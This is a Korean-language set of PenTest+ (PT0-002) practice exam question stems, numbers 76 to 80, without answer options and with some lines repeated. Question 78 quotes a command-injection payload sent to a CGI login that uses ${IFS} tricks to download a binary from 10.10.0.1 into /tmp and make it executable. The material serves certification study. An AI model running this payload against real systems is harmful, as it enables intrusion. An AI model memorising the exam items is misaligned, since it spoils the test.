PT0-002 문제 76
침투 테스터는 시스템에 대한 액세스 권한을 얻고 사용자 프로세스로 마이그레이션할 수 있습니다.
위의 출력이 주어지면 다음 중 침투 테스터가 수행하는 작업은 무엇입니까? (2개를 선택하세요.)
위의 출력이 주어지면 다음 중 침투 테스터가 수행하는 작업은 무엇입니까? (2개를 선택하세요.)
PT0-002 문제 77
최고 정보 보안 책임자(CIO)는 최근 설치된 방화벽이 수십 년 된 레거시 시스템이 연결된 하위 네트워크를 보호하고 있는지 여부를 평가하기 위해 침투 테스터를 원합니다. 침투 테스터는 모든 시스템과 잠재적인 취약점을 식별하기 위해 OS 검색과 전체 포트 스캔을 실행하기로 결정합니다. 다음 중 침투 테스터가 스캔을 실행하기 전에 고려해야 할 사항은 무엇입니까?
PT0-002 문제 78
침투 테스터가 익스플로잇을 사용하여 시스템에 액세스할 수 있었습니다. 다음은 활용된 코드의 일부입니다.
익스플로잇 = "POST"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후에 실행해야 하는 명령은 무엇입니까?
익스플로잇 = "POST"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후에 실행해야 하는 명령은 무엇입니까?
PT0-002 문제 79
침투 테스터는 업무 시간 외 시간에 고객의 건물에 들어가려고 시도하기 위해 승인된 물리적 침투 테스트를 수행하고 있습니다. 다음 중 침투 테스터가 테스트 중에 갖춰야 할 가장 중요한 것은 무엇입니까? (2개를 선택하세요.)
PT0-002 문제 80
다음 중 수동 정찰을 지원하기 위해 IoT 장치에 대한 공급업체 및 기타 보안 관련 정보를 수집하는 데 가장 유용한 도구는 무엇입니까?